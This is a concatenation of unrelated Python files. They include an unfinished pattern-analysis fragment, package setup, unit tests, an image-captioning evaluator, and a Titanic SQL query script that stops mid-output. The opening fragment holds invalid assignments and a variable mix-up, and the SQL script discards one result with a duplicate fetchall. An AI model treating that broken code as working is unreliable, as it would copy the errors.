s, ix, x, I, D, Dy, M, My, G, oG, Olp, t2_, Pm, Pd, mx, dx, mL, dL, mI, dI, mD, dD, mDy, dDy, mM, dM, mMy, dMy, div_f, nvars = P
pars_ = [(x, mx, dx), (len(t2_), mL, dL), (I, mI, dI), (D, mD, dD), (Dy, mDy, dDy), (M, mM, dM), (My, mMy, dMy)] # no nvars?
for par, Par in zip(pars_, Pars): # PP Par (Ip, Mp, Dp, par_) += par (p, mp, dp):
p, mp, dp = par
Ip, Mp, Dp, par_ = Par
Ip += p; Mp += mp; Dp += dp; par_.append((p, mp, dp))
Par = Ip, Mp, Dp, par_ # how to replace Par in Pars_?
for Par in Pars: # select form_par_P -> Par_vP, Par_dP: combined vs. separate: shared access and overlap eval?
Ip, Mp, Dp, par_ = Par
if Mp + Dp > ave * 9 * 7 * 2 * 2: # ave PP * ave par_P rdn * rdn to PP * par_P typ rdn?
par_vPS, par_dPS = form_par_P(0, par_)
par_Pf = 1 # flag
else:
par_Pf = 0; par_vPS = Ip, Mp, Dp, par_; par_dPS = Ip, Mp, Dp, par_
Par = par_Pf, par_vPS, par_dPS
# how to replace Par in Pars_?
return PP
def form_par_P(typ, param_): # forming parameter patterns within par_:
p, mp, dp = param_.pop() # initial parameter
Ip = p, Mp = mp, Dp = dp, p_ = [] # Par init
_vps = 1 if mp > ave * 7 > 0 else 0 # comp cost = ave * 7, or rep cost: n vars per par_P?
_dps = 1 if dp > 0 else 0
par_vP = Ip, Mp, Dp, p_ # also sign, typ and par olp: for eval per par_PS?
par_dP = Ip, Mp, Dp, p_
par_vPS = 0, 0, 0, [] # IpS, MpS, DpS, par_vP_
par_dPS = 0, 0, 0, [] # IpS, MpS, DpS, par_dP_
for par in param_: # all vars are summed in incr_par_P
p, mp, dp = par
vps = 1 if mp > ave * 7 > 0 else 0
dps = 1 if dp > 0 else 0
if vps == _vps:
Ip, Mp, Dp, par_ = par_vP
Ip += p; Mp += mp; Dp += dp; par_.append(par)
par_vP = Ip, Mp, Dp, par_
else:
par_vP = term_par_P(0, par_vP)
IpS, MpS, DpS, par_vP_ = par_vPS
IpS += Ip; MpS += Mp; DpS += Dp; par_vP_.append(par_vP)
par_vPS = IpS, MpS, DpS, par_vP_
par_vP = 0, 0, 0, []
if dps == _dps:
Ip, Mp, Dp, par_ = par_dP
Ip += p; Mp += mp; Dp += dp; par_.append(par)
par_dP = Ip, Mp, Dp, par_
else:
par_dP = term_par_P(1, par_dP)
IpS, MpS, DpS, par_dP_ = par_dPS
IpS += Ip; MpS += Mp; DpS += Dp; par_dP_.append(par_dP)
par_vPS = IpS, MpS, DpS, par_dP_
par_dP = 0, 0, 0, []
_vps = vps; _dps = dps
return par_vPS, par_dPS # tuples: Ip, Mp, Dp, par_P_, added to Par
# LIDV per dx, L, I, D, M? also alt2_: fork_ alt_ concat, for rdn per PP?
# fpP fb to define vpPs: a_mx = 2; a_mw = 2; a_mI = 256; a_mD = 128; a_mM = 128
def term_par_P(typ, par_P): # from form_par_P: eval for orient, re_comp? or folded?
return par_P
def scan_par_P(typ, par_P_): # from term_PP, folded in scan_par_? pP rdn per vertical overlap?
return par_P_
def comp_slice_P(par_P, _par_P): # with/out orient, from scan_pP_
return par_P
def scan_PP_(PP_): # within a blob, also within a segment?
return PP_
def comp_sliceP(PP, _PP): # compares PPs within a blob | segment, -> forking PPP_: very rare?
return PP
'''
horiz_dim_val = ave_Lx - |Dx| / 2 # input res and coord res are adjusted so mag approximates predictive value,
vertical_dim_val = Ly - |Dy| / 2 # or proj M = M - (|D| / M) / 2: no neg?
core params G and M represent value of all others, no max Pm = L + |V| + |Dx| + |Dy|: redundant and coef-filtered?
no * Ave_blob / Ga: angle match rate, already represented by hforks' position + mag' V+G -> comp( d | ortho_d)?
eval per blob, too expensive for seg? no abs_Dx, abs_Dy for comp dert eval: mostly redundant?
colors will be defined as color / sum-of-colors, color Ps are defined within sum_Ps: reflection object?
relative colors may match across reflecting objects, forming color | lighting objects?
comp between color patterns within an object: segmentation?
''' |
#!/usr/bin/env python
"""
sentry-sprintly
===============
An extension for Sentry which integrates with Sprint.ly.
:copyright: (c) 2014 by Matt Robenolt, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from setuptools import setup, find_packages
install_requires = [
'sentry>=5.0.0',
]
setup(
name='sentry-sprintly',
version='0.1.5',
author='Matt Robenolt',
author_email='[email protected]',
url='http://github.com/mattrobenolt/sentry-sprintly',
description='A Sentry extension which integrates with Sprint.ly',
long_description=__doc__,
license='BSD',
packages=find_packages(exclude=['tests']),
zip_safe=False,
install_requires=install_requires,
include_package_data=True,
entry_points={
'sentry.apps': [
'sprintly = sentry_sprintly',
],
'sentry.plugins': [
'sprintly = sentry_sprintly.plugin:SprintlyPlugin',
]
},
classifiers=[
'Framework :: Django',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Operating System :: OS Independent',
'Topic :: Software Development'
],
)
|
import datetime
import json
import uuid
import unittest
import pandas as pd
from spylunking.log.setup_logging import test_logger
from celery_connectors.publisher import Publisher
log = test_logger(name='test_base')
class BaseTestCase(unittest.TestCase):
def setUp(
self):
"""setUp"""
self.name = "testing_{}".format(
str(uuid.uuid4()))
self.broker_url = "memory://localhost/"
self.ssl_options = None
self.serializer = "json"
self.train_exchange_name = "webapp.train.requests"
self.train_routing_key = "webapp.train.requests"
self.train_queue_name = "webapp.train.requests"
self.predict_exchange_name = "webapp.predict.requests"
self.predict_routing_key = "webapp.predict.requests"
self.predict_queue_name = "webapp.predict.requests"
self.pub = None
# end of setUp
def get_broker(
self):
"""get_broker"""
return self.broker_url
# end of get_broker
def get_ssl_options(
self):
"""get_ssl_options"""
return self.ssl_options
# end of get_broker
def get_publisher(
self,
broker_url=None,
ssl_options=None):
"""get_publisher
:param broker_url: broker url
:param ssl_options: sll options
"""
if self.pub:
return self.pub
self.pub = Publisher(
name=self.name,
auth_url=self.broker_url,
ssl_options=self.ssl_options)
return self.pub
# end of get_publisher
def publish(
self,
body=None,
exchange=None,
routing_key=None,
queue=None,
serializer="json",
retry=True,
silent=True):
use_exchange = exchange
if not use_exchange:
use_exchange = self.train_exchange_name
use_routing_key = routing_key
if not use_routing_key:
use_routing_key = self.train_routing_key
use_queue = queue
if not use_queue:
use_queue = self.train_queue_name
log.info(("Sending msg={} "
"ex={} rk={}")
.format(
body,
use_exchange,
use_routing_key))
# Publish the message:
self.pub.publish(
body=body,
exchange=use_exchange,
routing_key=use_routing_key,
queue=use_queue,
serializer=serializer,
retry=retry)
# end of publish
def build_train_antinex_request(
self,
data_file=("./training/"
"django-antinex-simple.json")):
"""build_model_and_weights
:param data_file: train and predict request
"""
body = {}
with open(data_file, "r") as cur_file:
file_contents = cur_file.read()
body = json.loads(file_contents)
# Now send:
now = datetime.datetime.now().isoformat()
body["created"] = now
log.info("loading predict_rows")
predict_rows_df = pd.read_csv(body["dataset"])
predict_rows = []
for idx, org_row in predict_rows_df.iterrows():
new_row = json.loads(org_row.to_json())
new_row["idx"] = len(predict_rows) + 1
predict_rows.append(new_row)
body["predict_rows"] = pd.DataFrame(predict_rows).to_json()
log.info(("using predict_rows={}")
.format(
len(predict_rows)))
return body
# end of build_train_antinex_request
def build_predict_antinex_request(
self,
data_file=("./training/"
"django-antinex-simple.json")):
"""build_model_and_weights
:param data_file: predict request
"""
body = {}
with open(data_file, "r") as cur_file:
file_contents = cur_file.read()
body = json.loads(file_contents)
# Now send:
now = datetime.datetime.now().isoformat()
body["created"] = now
log.info("loading predict_rows")
predict_rows_df = pd.read_csv(body["dataset"])
predict_rows = []
for idx, org_row in predict_rows_df.iterrows():
new_row = json.loads(org_row.to_json())
new_row["idx"] = len(predict_rows) + 1
predict_rows.append(new_row)
body["predict_rows"] = pd.DataFrame(predict_rows).to_json()
log.info(("using predict_rows={}")
.format(
len(predict_rows)))
return body
# end of build_predict_antinex_request
def build_predict_scaler_antinex_request(
self,
data_file=("./training/"
"scaler-django-antinex-simple.json")):
"""build_model_and_weights
:param data_file: predict request
"""
body = {}
with open(data_file, "r") as cur_file:
file_contents = cur_file.read()
body = json.loads(file_contents)
# Now send:
now = datetime.datetime.now().isoformat()
body["created"] = now
log.info("loading predict_rows")
predict_rows_df = pd.read_csv(body["dataset"])
predict_rows = []
for idx, org_row in predict_rows_df.iterrows():
new_row = json.loads(org_row.to_json())
new_row["idx"] = len(predict_rows) + 1
predict_rows.append(new_row)
body["predict_rows"] = pd.DataFrame(predict_rows).to_json()
log.info(("using predict_rows={}")
.format(
len(predict_rows)))
return body
# end of build_predict_scaler_antinex_request
def build_predict_rows_from_dataset(
self,
data_file=("./training/"
"scaler-django-antinex-simple.json"),
num_rows_at_bottom=2):
"""build_model_and_weights
:param data_file: predict request
"""
body = {}
with open(data_file, "r") as cur_file:
file_contents = cur_file.read()
body = json.loads(file_contents)
# Now send:
now = datetime.datetime.now().isoformat()
body["created"] = now
log.info("loading predict_rows")
predict_rows_df = pd.read_csv(body["dataset"])
predict_rows = []
use_start_idx = num_rows_at_bottom
if use_start_idx > 0:
use_start_idx = -1 * use_start_idx
for idx, org_row in predict_rows_df.iloc[use_start_idx:].iterrows():
new_row = json.loads(org_row.to_json())
new_row["idx"] = len(predict_rows) + 1
new_row["_dataset_index"] = idx
predict_rows.append(new_row)
body["predict_rows"] = pd.DataFrame(predict_rows).to_json()
log.info(("using predict_rows={}")
.format(
len(predict_rows)))
return body
# end of build_predict_rows_from_dataset
def build_regression_train_request(
self,
data_file=("./tests/train/"
"regression.json")):
"""build_model_and_weights
:param data_file: train and predict request
"""
body = {}
with open(data_file, "r") as cur_file:
file_contents = cur_file.read()
body = json.loads(file_contents)
return body
# end of build_regression_train_request
# end of BaseTestCase
|
import inspect
import psyneulink as pnl
import pytest
from psyneulink.core.components.projections.modulatory.modulatoryprojection import ModulatoryProjection_Base
from psyneulink.core.components.projections.pathway.pathwayprojection import PathwayProjection_Base
# gather all Component classes (a set to ensure no duplicates)
component_classes = []
component_class_constructor_arguments = {}
for item in pnl.__all__:
evaled = eval(f'pnl.{item}')
if isinstance(
evaled,
pnl.core.components.component.ComponentsMeta
):
component_classes.append(evaled)
component_class_constructor_arguments[evaled] = inspect.signature(
evaled.__init__
).parameters
component_classes.sort(key=lambda x: x.__name__)
@pytest.mark.parametrize(
'class_type',
[
pnl.Mechanism_Base,
pnl.Function_Base,
pnl.Port_Base,
ModulatoryProjection_Base,
PathwayProjection_Base,
]
)
def test_abstract_classes(class_type):
with pytest.raises(TypeError) as err:
class_type()
assert 'abstract class' in str(err.value)
@pytest.mark.parametrize(
'class_',
component_classes
)
def test_function_parameters_stateless(class_):
try:
assert class_.parameters.function.stateful is False, (
f'{class_.__name__}.parameters.function.stateful is True. '
'The function Parameter for Components is currently '
'expected to be stateless (defined as stateful=False)'
)
except AttributeError:
pass
@pytest.mark.parametrize(
'class_',
component_classes
)
def test_parameters_user_specified(class_):
violators = set()
constructor_parameters = inspect.signature(class_.__init__).parameters
for name, param in constructor_parameters.items():
if (
param.kind in {
inspect.Parameter.POSITIONAL_OR_KEYWORD,
inspect.Parameter.KEYWORD_ONLY
}
and name in class_.parameters.names()
and param.default is not inspect.Parameter.empty
and param.default is not None
):
violators.add(name)
message = (
"If a value other than None is used as the default value in a class's"
+ ' constructor/__init__, for an argument corresponding to a Parameter,'
+ ' _user_specified will always be True. The default value should be'
+ " specified in the class's Parameters inner class. Violators for"
+ f' {class_.__name__}: {violators}'
)
assert violators == set(), message
|
#Standard Library Input
#Third Party Inputs
#Local Application Inputs
class Wrapper():
def BoldWrapper(self, message):
return f'**{message}**'
def UpperWrapper(self, message):
return message.upper()
def ItalicWrapper(self, message):
return f'*{message}*'
def AllAngryWrapper(self, message):
return f'{self.BoldWrapper(self.ItalicWrapper(self.UpperWrapper(message+"!")))}'
def CodeWrapper(self, message):
return f'`{message}`'
def CodeBlockWrapper(self, message):
return f'```{message}```'
def BackQuoteWrapper(self, message):
return f'> {message}' |
#!/usr/bin/env python
# coding=utf-8
import math
def k_quantiles(items, k):
index = median_index(len(items))
if k == 1:
return []
elif k % 2:
n = len(items)
left_index = math.ceil((k // 2) * (n / k)) - 1
right_index = n - left_index - 1
left = select(items, left_index)
right = select(items, right_index)
partition(items, left)
lower = k_quantiles(items[:left], k // 2)
partition(items, right)
upper = k_quantiles(items[right + 1:], k // 2)
return lower + [left, right] + upper
else:
index = median_index(len(items))
median = select(items, index)
partition(items, median)
return k_quantiles(items[:index], k // 2) + [median] + k_quantiles(items[index + 1:], k // 2)
def median_index(n):
if n % 2:
return n // 2
else:
return n // 2 - 1
def partition(items, element):
i = 0
for j in range(len(items) - 1):
if items[j] == element:
items[j], items[-1] = items[-1], items[j]
if items[j] < element:
items[i], items[j] = items[j], items[i]
i += 1
items[i], items[-1] = items[-1], items[i]
return i
def select(items, n):
if len(items) <= 1:
return items[0]
medians = []
for i in range(0, len(items), 5):
group = sorted(items[i:i + 5])
items[i:i + 5] = group
median = group[median_index(len(group))]
medians.append(median)
pivot = select(medians, median_index(len(medians)))
index = partition(items, pivot)
if n == index:
return items[index]
elif n < index:
return select(items[:index], n)
else:
return select(items[index + 1:], n - index - 1)
arr = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18]
print k_quantiles(arr, 4)
|
from os import path, system
hosts = [ 'atat_21mer', 'g_tract_21mer', 'a_tract_21mer', 'gcgc_21mer',
'ctct_21mer', 'tgtg_21mer', 'tat_21mer', 'tat_1_21mer', 'tat_2_21mer', 'tat_3_21mer']
rootfolder = '/home/yizaochen/codes/dna_rna/all_systems'
fhelix_folder = '/home/yizaochen/codes/dna_rna/length_effect/find_helical_axis'
for host in hosts:
f_input_folder = path.join(fhelix_folder, host, 'input')
f_pdb = path.join(f_input_folder, 'bdna+bdna.npt4.all.pdb')
f_dcd = path.join(f_input_folder, 'bdna+bdna.0_5000ns.50000frames.dcd')
cmd = f'vmd -pdb {f_pdb} {f_dcd}'
print(cmd) |
"""
Test for testing runbook generated json against known json
"""
import os
from calm.dsl.runbooks import runbook_json
from decision_task import DslDecisionRunbook
from existing_endpoint import DslExistingEndpoint
from parallel import DslParallelRunbook
from runbook_variables import DslRunbookWithVariables
from simple_runbook import DslSimpleRunbook
from while_loop import DslWhileLoopRunbook
def test_runbook_json(Runbook, json_file):
"""
Test the generated json for a runbook agains known output
"""
print("JSON compilation test for {}".format(Runbook.action_name))
dir_path = os.path.dirname(os.path.realpath(__file__))
file_path = os.path.join(dir_path, json_file)
generated_json = runbook_json(Runbook)
known_json = open(file_path).read()
assert generated_json == known_json
print("JSON compilation successful for {}".format(Runbook.action_name))
def test_runbooks():
runbooks = {
"test_decision_task.json": DslDecisionRunbook,
"test_existing_endpoint.json": DslExistingEndpoint,
"test_parallel.json": DslParallelRunbook,
"test_runbook_variables.json": DslRunbookWithVariables,
"test_simple_runbook.json": DslSimpleRunbook,
"test_while_loop.json": DslWhileLoopRunbook,
}
for json_file, runbook in runbooks.items():
test_runbook_json(runbook, json_file)
if __name__ == "__main__":
test_runbooks()
|
import os
import shutil
import fileinput
from time import sleep
FOLDER1 = "/../client1/conf/Sync"
FOLDER2 = "/../client2/conf/Sync"
TEST_STRING = "This is a test string to verify that sharing works."
PWD = os.getcwd()
FILE1 = ('test.txt')
FILE2 = ('test2.txt')
STRING2 = "This is a second string."
STRING3 = "Even more exciting."
#def main():
# add_text(FILE1, TEST_STRING, FOLDER1
# replace_text(FILE1, FOLDER2, STRING2, TEST_STRING)
# add_text(FILE2, STRING3, FOLDER2)
# delete_file(FILE1, FOLDER1)
def clear():
DIR = PWD+FOLDER1
for the_file in os.listdir(DIR):
file_path = os.path.join(DIR, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
except Exception as e:
print(e)
DIR=PWD+FOLDER2
for the_file in os.listdir(DIR):
file_path = os.path.join(DIR, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
except Exception as e:
print(e)
def delete_file(filename, folder):
os.chdir(PWD + folder)
if os.path.exists(filename):
os.remove(filename)
else:
print("The file does not exist")
return
check_change(filename, "", folder)
def replace_text(filename, folder, textToReplace, textToRemove):
os.chdir(PWD+folder)
if not os.path.exists(filename):
print("The file does not exist.")
return
f = open(filename, 'r')
text = f.read()
f.close()
newText = text.replace(textToRemove, textToReplace)
f = open(filename, 'w')
f.write(newText)
f.close()
check_change(filename, newText, folder)
def add_text(filename, filetext, folder):
os.chdir(PWD+folder)
f = open(filename,'w+')
f.write(filetext)
f.close()
check_change(filename, filetext, folder)
def move_file(filename, folder):
shutil.copy2(PWD+"/../dataToShare" +filename, PWD+folder)
TIMEOUT = 70
for i in range(TIMEOUT):
sleep(1)
if folder==FOLDER1:
if os.path.exists(PWD+FOLDER2+filename):
print("Big file transferred successfully.")
return
else:
if os.path.exists(PWD+FOLDER1+filename):
print ("Big file transferred successfully.")
return
print ("Big file transfer failed")
def check_change(filename, textCheck, folder):
TIMEOUT=70
for i in range(TIMEOUT):
sleep(1)
if folder==FOLDER1: os.chdir(PWD + FOLDER2)
else: os.chdir (PWD + FOLDER1)
try:
f2 = open(filename,'r')
text = f2.read()
if textCheck==text:
print("File transferred successfully.")
return
except FileNotFoundError:
if textCheck=='':
print("File deleted successfully.")
return
elif i==TIMEOUT-1:
print ("File not transferred.")
return
else:
pass
print("Oops. Something went wrong. Output: " + text)
#if __name__=="__main__":
# main()
|
from numpy import argmax
from pickle import load
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from nltk.translate.bleu_score import corpus_bleu
# remove start/end sequence tokens from a summary
def cleanup_summary(summary):
# remove start of sequence token
index = summary.find('startseq ')
if index > -1:
summary = summary[len('startseq '):]
# remove end of sequence token
index = summary.find(' endseq')
if index > -1:
summary = summary[:index]
return summary
# map an integer to a word
def word_for_id(integer, tokenizer):
for word, index in tokenizer.word_index.items():
if index == integer:
return word
return None
# generate a description for an image
def generate_desc(model, tokenizer, photo, max_length):
# seed the generation process
in_text = 'startseq'
# iterate over the whole length of the sequence
for _ in range(max_length):
# integer encode input sequence
sequence = tokenizer.texts_to_sequences([in_text])[0]
# pad input
sequence = pad_sequences([sequence], maxlen=max_length)
# predict next word
yhat = model.predict([photo,sequence], verbose=0)
# convert probability to integer
yhat = argmax(yhat)
# map integer to word
word = word_for_id(yhat, tokenizer)
# stop if we cannot map the word
if word is None:
break
# append as input for generating the next word
in_text += ' ' + word
# stop if we predict the end of the sequence
if word == 'endseq':
break
return in_text
def evaluate_model(model, descriptions, photos, tokenizer, max_length):
actual, predicted = list(), list()
# step over the whole set
for key, desc_list in descriptions.items():
# generate description
yhat = generate_desc(model, tokenizer, photos[key], max_length)
# clean up prediction
yhat = cleanup_summary(yhat)
# store actual and predicted
references = [cleanup_summary(d).split() for d in desc_list]
actual.append(references)
predicted.append(yhat.split())
# calculate BLEU score
print('BLEU-1: %f' % corpus_bleu(actual, predicted, weights=(1.0, 0, 0, 0)))
print('BLEU-2: %f' % corpus_bleu(actual, predicted, weights=(0.5, 0.5, 0, 0)))
print('BLEU-3: %f' % corpus_bleu(actual, predicted, weights=(0.3, 0.3, 0.3, 0)))
print('BLEU-4: %f' % corpus_bleu(actual, predicted, weights=(0.25, 0.25, 0.25, 0.25)))
def prepare_evaluate_params(c, model,feature_file_name):
history_file_name = "dense-model_run_history.pkl"
best_epoch_filename = "dense-model-ep003-loss3.519-val_loss3.735.h5"
from utils.dataprep import load_set, load_photo_features
from utils.dataprep import load_clean_descriptions, get_tokenizer, max_length_desc
from utils.inputprep import create_sequences, data_generator
feature_file_name = c.ExtractedFeaturesFilePath(feature_file_name)
model.summary()
test = load_set(c.FlickrTextFilePath("Flickr_8k.testImages.txt"))
test_features = load_photo_features(feature_file_name, test)
test_descriptions = load_clean_descriptions(c.ExtractedFeaturesFilePath('descriptions.txt'), test)
print("Test photos: %i" % (len(test_features)))
print("test descriptions: %i" % (len(test_descriptions)))
# prepare tokensizer
tokenizer = get_tokenizer(c.TokenizerFilePath)
max_length = 34 # check my comment on the model summary cell.
vocab_size = len(tokenizer.word_index) + 1
print( "Tokensizer vocalulary size: %i, Description max length: %i " % (vocab_size, max_length))
# print("running bleu test ... ")
# evaluate_model(model, test_descriptions, test_features, tokenizer, max_length)
return tokenizer, test_features, test_descriptions, max_length
def get_demo_captions(model, photos, tokenizer, max_length, demo_list):
captions = list()
for key in demo_list:
# generate description
caption = generate_desc(model, tokenizer, photos[key], max_length)
captions.append(caption)
return(captions)
def demo_captions(c, model, test_features, tokenizer, test_descriptions, max_length):
curly = '1015118661_980735411b'
demo_list = ('3497224764_6e17544e0d','3044500219_778f9f2b71','3119076670_64b5340530','1220401002_3f44b1f3f7', '241345844_69e1c22464', '2762301555_48a0d0aa24', '3364861247_d590fa170d', '3406930103_4db7b4dde0', '1343426964_cde3fb54e8', '2984174290_a915748d77', '2913965136_2d00136697', '2862004252_53894bb28b', '3697359692_8a5cdbe4fe')
demo_path = c.flickr_images_directory + "/"
demo_captions_list = get_demo_captions(model, test_features, tokenizer, max_length, demo_list)
import matplotlib.pyplot as plt
from keras.preprocessing.image import load_img
for k in range(len(demo_list)):
img=load_img(demo_path + demo_list[k]+'.jpg')
imgplot = plt.imshow(img)
plt.show()
print(demo_captions_list[k])
def predict_img( model, tokenizer, max_length, img_filepath, cnn_model,cnn_model_features, cnn_model_app, target_size = (224,224)):
from keras.preprocessing.image import load_img, img_to_array
img = load_img(img_filepath,target_size=target_size )
img_in = img_to_array(img)
img_in = img_in.reshape((1, target_size[0], target_size[1], 3))
img_in = cnn_model_app.preprocess_input(img_in)
# generate classifcation predictions for the image -- informational only
img_p = cnn_model.predict(img_in)
label = cnn_model_app.decode_predictions(img_p)
prediction = label[0][0]
print("%s (%.2f%%)" % (prediction[1], prediction[2]*100))
print(label)
# generaetion feature represenation, after poping the last softmax layer
# cnn_model.layers.pop()
# cnn_model_features = Model(inputs=cnn_model_features.inputs, outputs=cnn_model_features.layers[-1].output)
photo = cnn_model_features.predict(img_in)
# seed the generation process
in_text = 'startseq'
# iterate over the whole length of the sequence
for i in range(max_length):
# integer encode input sequence
sequence = tokenizer.texts_to_sequences([in_text])[0]
# pad input
sequence = pad_sequences([sequence], maxlen=max_length)
# predict next word
yhat = model.predict([photo,sequence], verbose=0)
# convert probability to integer
yhat = argmax(yhat)
# map integer to word
word = word_for_id(yhat, tokenizer)
# stop if we cannot map the word
if word is None:
break
# append as input for generating the next word
in_text += ' ' + word
# intermidiary print
print("%i>> %s" %(i, in_text))
# stop if we predict the end of the sequence
if word == 'endseq':
break
import matplotlib.pyplot as plt
plt.imshow(img) # rgbs float will clip to 0..1, other wise us integer
plt.show()
print("CNN model classification: %s (%.2f%%)" % (prediction[1], prediction[2]*100))
print("caption: %s" % (in_text))
|
import pytest
from auth_api.db import db
from auth_api.queries import UserQuery
from tests.auth_api.queries.query_base import TestQueryBase, USER_LIST
class TestUserQueries(TestQueryBase):
"""
Tests cases where a subject in written into the database
and can be returned if correct subject is called.
"""
@pytest.mark.parametrize('ssn', ['SSN_1', 'SSN_2', 'SSN_3'])
def test__correct_number_of_ssns__return_correct_number_of_users(
self,
seeded_session: db.Session,
ssn: str,
):
"""
Test if the correct number of users, exits in the database
and returns true if they exists.
:param seeded_session: Mocked database session
"""
# -- Act -------------------------------------------------------------
seeded_users = [user for user in USER_LIST if user['ssn'] == ssn]
print(seeded_users)
# -- Assert ----------------------------------------------------------
assert len(seeded_users) > 0
assert len(seeded_users) == 1
@pytest.mark.parametrize('user', USER_LIST)
def test__has_ssn__ssn_exists__return_correct_user(
self,
seeded_session: db.Session,
user: dict,
):
"""
Test if the current user, with a given ssn, exits in the database
and returns true if it exists.
:param seeded_session: Mocked database session
:param user: Current user inserted into the test
"""
# -- Act -------------------------------------------------------------
query = UserQuery(seeded_session) \
.has_ssn(user['ssn']) \
.one_or_none()
# -- Assert ----------------------------------------------------------
assert query is not None
assert query.ssn == user['ssn']
def test__has_snn__ssn_does_not_exists__return_none(
self,
seeded_session: db.Session,
):
"""
Test if a user with an invalid ssn exits in the database and returns
None if it does not exist.
:param seeded_session: Mocked database session
"""
# -- Act -------------------------------------------------------------
query = UserQuery(seeded_session) \
.has_ssn('invalid_ssn') \
.one_or_none()
# -- Assert ----------------------------------------------------------
assert query is None
@pytest.mark.parametrize('user', USER_LIST)
def test__has_tin__tin_exists__return_correct_user(
self,
seeded_session: db.Session,
user: dict,
):
"""
Test if the current user, with a given tin, exits in the database
and returns true if it exists.
:param seeded_session: Mocked database session
:param user: Current user inserted into the test
"""
# -- Act -------------------------------------------------------------
query = UserQuery(seeded_session) \
.has_tin(user['cvr']) \
.one_or_none()
# -- Assert ----------------------------------------------------------
assert query is not None
assert query.cvr == user['cvr']
def test__has_tin__tin_does_not_exists__return_none(
self,
seeded_session: db.Session,
):
"""
Test if a user with an invalid tin exits in the database and
returns None if it does not exist.
:param seeded_session: Mocked database session
"""
# -- Act -------------------------------------------------------------
query = UserQuery(seeded_session) \
.has_tin('invalid_tin') \
.one_or_none()
# -- Assert ----------------------------------------------------------
assert query is None
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.test import TestCase
from dashboard.models import Node, Order
from .models import History_order
from django.contrib.auth.models import User
from django.utils import timezone
from datetime import datetime, timedelta
from .views import firewall_open_port
# Create your tests here.
class HistoryorderModeltest(TestCase):
def setUp(self):
u = User()
u.save()
History_order.objects.create(user=u,
plan='T',
order_date=timezone.now()-timedelta(days=1),
valid_date=timezone.now()-timedelta(days=1),
dead_date=timezone.now()+timedelta(days=1)
)
def test_status(self):
ho = History_order.objects.all()[0]
self.assertEqual(ho.status(),1)
def test_tzinfo(self):
ho = History_order.objects.all()[0]
self.assertEqual(ho.order_date.tzinfo,None)
def test_firewall_open_port(self):
port = 20002
shell_output = firewall_open_port(20002)
print shell_output
self.assertEqual(str(port) in shell_output, True) |
import psycopg2
dbname = 'REDACTED'
user = 'REDACTED'
password = 'REDACTED'
host = 'REDACTED'
pg_conn = psycopg2.connect(database=dbname, user=user, password=password, host=host)
pg_curs = pg_conn.cursor()
print("Titanic questions")
print("\nHow many passengers survived, and how many died? (Percentage survival)")
pg_curs.execute('SELECT AVG(survived) FROM titanic_set2;')
print(pg_curs.fetchall())
print("\nHow many passengers were in each class?")
pg_curs.execute(' \
SELECT pclass, COUNT(pclass) \
FROM titanic_set2 \
GROUP By pclass; \
')
print(pg_curs.fetchall())
print("\nHow many passengers survived/died within each class?")
print("Survived")
pg_curs.execute(' \
SELECT pclass, COUNT(survived) \
FROM titanic_set2 \
WHERE survived = 1 \
GROUP BY pclass \
ORDER BY pclass \
;')
print(pg_curs.fetchall())
print("Did not survive")
pg_curs.execute(' \
SELECT pclass, COUNT(survived) \
FROM titanic_set2 \
WHERE survived = 0 \
GROUP BY pclass \
ORDER BY pclass \
;')
print(pg_curs.fetchall())
print("\nWhat was the average age of survivors vs nonsurvivors?")
pg_curs.execute(' \
SELECT survived, AVG(age) \
FROM titanic_set2 \
GROUP BY survived \
;')
print(pg_curs.fetchall())
print("\nWhat was the average age of each passenger class?")
pg_curs.execute(' \
SELECT pclass, AVG(age) \
FROM titanic_set2 \
GROUP BY pclass \
ORDER BY pclass \
;')
print(pg_curs.fetchall())
print("\nWhat was the average fare by passenger class? By survival?")
print("By class")
pg_curs.execute(' \
SELECT pclass, AVG(fare) \
FROM titanic_set2 \
GROUP BY pclass \
ORDER BY pclass \
;')
print(pg_curs.fetchall())
print("By survival")
pg_curs.execute(' \
SELECT survived, AVG(fare) \
FROM titanic_set2 \
GROUP BY survived \
ORDER BY survived \
;')
print(pg_curs.fetchall())
print("\nHow many siblings/spouses aboard on average, by passenger class? By survival?")
print("By class")
pg_curs.execute(' \
SELECT pclass, AVG(siblingsspousesaboard) \
FROM titanic_set2 \
GROUP BY pclass \
ORDER BY pclass \
;')
print(pg_curs.fetchall())
print("By survival")
pg_curs.execute(' \
SELECT survived, AVG(siblingsspousesaboard) \
FROM titanic_set2 \
GROUP BY survived \
ORDER BY survived \
;')
print(pg_curs.fetchall())
print("\nHow many parents/children aboard on average, by passenger class? By survival?")
print("By class")
pg_curs.execute(' \
SELECT pclass, AVG(parentschildrenaboard) \
FROM titanic_set2 \
GROUP BY pclass \
ORDER BY pclass \
;')
print(pg_curs.fetchall())
print("By survival")
pg_curs.execute(' \
SELECT survived, AVG(parentschildrenaboard) \
FROM titanic_set2 \
GROUP BY survived \
ORDER BY survived \
;')
print(pg_curs.fetchall())
print("\nDo any passengers have the same name?")
print("Total names")
pg_curs.execute(' \
SELECT COUNT(name) \
FROM titanic_set2 \
;')
print(pg_curs.fetchall())
print("Total distinct names")
pg_curs.execute(' \
SELECT COUNT(DISTINCT name) \
FROM titanic_set2 \
;')
pg_curs.fetchall()
print(pg_curs.fetchall())
print("All names unique")
pg_curs.close()
"""
Output
Titanic questions
How many passengers survived, and how many died? (Percentage survival)
[(Decimal('0.38556933483652762120'),)]
How many passengers were in each class?
[(1, 216), (3, 487), (2, 184)]
How many passengers survived/died within each class?
Survived
[(1, 136), (2, 87), (3, 119)]
Did not survive
[(1, 80), (2, 97), (3, 368)]
What was the average age of survivors vs nonsurvivors?
[(0, 30.1385321100917), (1, 28.4083918128272)]
What was the average age of each passenger class?
[(1, 38.7889814815587), (2, 29.8686413042571), (3, 25.188747433238)]
What was the average fare by passenger class? By survival?
By class
[(1, 84.154687528257), (2, 20.6621831810993), (3, 13.7077075010452)]
By survival
[(0, 22.2085840951412), (1, 48.3954076976107)]
How many siblings/spouses aboard on average, by passenger class? By survival?
By class
[(1, Decimal('0.41666666666666666667')), (2, Decimal('0.40217391304347826087')), (3, Decimal('0.62012320328542094456'))]
By survival
